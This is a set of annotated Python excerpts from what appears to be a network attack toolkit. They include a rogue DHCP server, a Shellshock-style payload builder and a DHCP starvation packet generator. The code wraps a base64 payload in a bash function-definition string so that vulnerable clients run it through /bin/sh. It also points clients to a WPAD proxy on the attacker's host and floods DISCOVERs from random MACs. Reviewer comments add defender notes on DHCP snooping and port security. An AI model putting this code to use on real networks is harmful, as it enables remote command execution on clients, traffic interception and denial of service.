# NOTE(review): this line of the page is a collapsed excerpt; the layout below
# is reconstructed from syntax. Everything down to the "[INFO] Send ack
# response!" print comes from function bodies whose `def` lines are not part
# of the excerpt (hence `global proxy`, `transaction_id`, `requested_ip`);
# it is shown flush-left only because the original indentation is lost.

# The payload is base64-encoded and wrapped in a bash function-definition
# prefix followed by a command that decodes it and pipes it to /bin/sh.
# Going by the variable name, this is a Shellshock-style string; where it is
# placed in the DHCP reply is not visible here.
# Defender note: only clients that hand DHCP option values to an unpatched
# bash are exposed; DHCP snooping on access ports keeps replies from
# untrusted hosts off the segment in the first place.
payload = b64encode(payload)
shellshock_url = "() { :" + "; }; /bin/sh <(/usr/bin/base64 -d <<< " + payload + ")"

if shellshock_url is not None:
    # Strings longer than 255 characters are rejected — presumably because a
    # DHCP option value has a one-byte length field (TODO confirm against the
    # packet builder). The code does not abort: it prints an error and
    # continues with the placeholder "A".
    if len(shellshock_url) > 255:
        print "[ERROR] Len of command is very big! Current len: " + str(len(shellshock_url))
        shellshock_url = "A"

# `proxy` is a module-level value. Without --proxy it defaults to a wpad.dat
# URL on the rogue server's own address, port 8080; otherwise the operator's
# value is used as given. How `proxy` is advertised to clients is not shown
# in this excerpt (presumably as a proxy auto-config option — verify).
global proxy
if args.proxy is None:
    proxy = bytes("http://" + dhcp_server_ip_address + ":8080/wpad.dat")
else:
    proxy = bytes(args.proxy)

# Build the DHCP ACK for this transaction and send it at layer 2 on the
# selected interface (sendp), with scapy's own output suppressed.
ack_packet = make_dhcp_ack_packet(transaction_id, requested_ip)
sendp(ack_packet, iface=current_network_interface, verbose=False)
print "[INFO] Send ack response!"

if __name__ == "__main__":
    # Entry point: capture DHCP client traffic (UDP 68 -> 67) on the selected
    # interface and pass every accepted frame to dhcp_reply.
    if args.target_mac is None:
        # No target given: listen for broadcast requests from any client,
        # skipping frames sent from the tool's own MAC addresses.
        # Detection hint: DHCP replies from a host that is not the sanctioned
        # server are the observable symptom of this mode.
        print "Waiting for a DHCP DISCOVER, DHCP REQUEST or DHCP INFORM ..."
        sniff(lfilter=lambda d: d.src != eth.get_mac_for_dhcp_discover() and d.src != Base.get_netiface_mac_address(current_network_interface),
              filter="udp and src port 68 and dst port 67 and dst host 255.255.255.255",
              prn=dhcp_reply,
              iface=current_network_interface)
    else:
        # Target given: accept only frames whose source MAC is the target;
        # the broadcast-destination restriction is dropped in this mode.
        print "Waiting for a DHCP DISCOVER, DHCP REQUEST or DHCP INFORM from " + args.target_mac + " ..."
        sniff(lfilter=lambda d: d.src == args.target_mac,
              filter="udp and src port 68 and dst port 67",
              prn=dhcp_reply,
              iface=current_network_interface)
# NOTE(review): this line of the page is a collapsed excerpt; the layout below
# is reconstructed from syntax. `count`, `count_max`, `index_percent`,
# `PACKETS` and `current_mac_address` are defined before the excerpt starts.

# Threshold (in packets) at which the next progress update is printed.
count_percent = 0

print "Creating packets..."
if args.notspoofmac:
    print " Your MAC address is not spoofed!"

eth = Ethernet_raw()
dhcp = DHCP_raw()

# Pre-build `count_max` DHCP DISCOVER frames into PACKETS; nothing is sent
# inside this loop.
while count < count_max:
    # Ethernet source: the real interface MAC when --notspoofmac is set,
    # otherwise the address returned by get_mac_for_dhcp_discover().
    if args.notspoofmac:
        SRC_MAC = current_mac_address
    else:
        SRC_MAC = eth.get_mac_for_dhcp_discover()

    # Every frame gets a fresh random client MAC and a random 8-character
    # host name, so each one looks like a different client to the server.
    # Defender note: a burst of DISCOVERs with many distinct client
    # identifiers from one port is the usual sign of DHCP pool exhaustion;
    # port security and DHCP snooping rate limits are the standard controls.
    CLIENT_MAC = eth.get_random_mac()
    HOST_NAME = Base.make_random_string(8)

    current_packet = dhcp.make_discover_packet(SRC_MAC, CLIENT_MAC, HOST_NAME)
    PACKETS.append(current_packet)
    count += 1

    # Progress display, rewritten in place via "\r".
    # NOTE(review): if count_max is an int below 100, `count_max / 100` is 0
    # under Python 2 integer division, so this branch runs on every packet
    # and the printed percentage can pass 100 — confirm the type of count_max.
    if count > count_percent:
        stdout.flush()
        stdout.write(" Complete: " + str(index_percent + 1) + "% \r")
        index_percent += 1
        count_percent = (count_max / 100) * index_percent
if __name__ == "__main__":
    # Entry point: choose a capture filter from the command-line options and
    # hand every accepted frame to dhcp_reply on the selected interface.
    # Defender note: in every mode the observable symptom is DHCP replies
    # from a host that is not the sanctioned server, which DHCP snooping on
    # access switches is designed to drop.

    # A target IP is only usable together with a target MAC: report and stop.
    if args.target_ip is not None and args.target_mac is None:
        print(Base.c_error + "Please set target MAC address (--target_mac 00:AA:BB:CC:DD:FF)")
        exit(1)

    if args.target_ip is not None:
        # Fixed IP for one client: ARP frames from the target are captured
        # alongside its DHCP requests. What dhcp_reply does with the ARP
        # frames is not visible in this excerpt.
        print(Base.c_info + "Waiting for ARP, DHCP DISCOVER, DHCP REQUEST or DHCP INFORM from " + args.target_mac)
        sniff(iface=current_network_interface,
              filter="arp or (udp and src port 68 and dst port 67)",
              lfilter=lambda d: d.src == args.target_mac,
              prn=dhcp_reply)
    elif args.target_mac is not None:
        # One client, no fixed IP: accept only DHCP frames whose source MAC
        # is the target.
        print(Base.c_info + "Waiting for a DHCP DISCOVER, DHCP REQUEST or DHCP INFORM from " + args.target_mac)
        sniff(iface=current_network_interface,
              filter="udp and src port 68 and dst port 67",
              lfilter=lambda d: d.src == args.target_mac,
              prn=dhcp_reply)
    else:
        # No target: listen for broadcast DHCP requests from any client,
        # ignoring frames that originate from the tool's own MAC addresses.
        print(Base.c_info + "Waiting for a DHCP DISCOVER, DHCP REQUEST or DHCP INFORM")
        sniff(iface=current_network_interface,
              filter="udp and src port 68 and dst port 67 and dst host 255.255.255.255",
              lfilter=lambda d: not (
                  d.src == eth.get_mac_for_dhcp_discover()
                  or d.src == Base.get_netiface_mac_address(current_network_interface)),
              prn=dhcp_reply)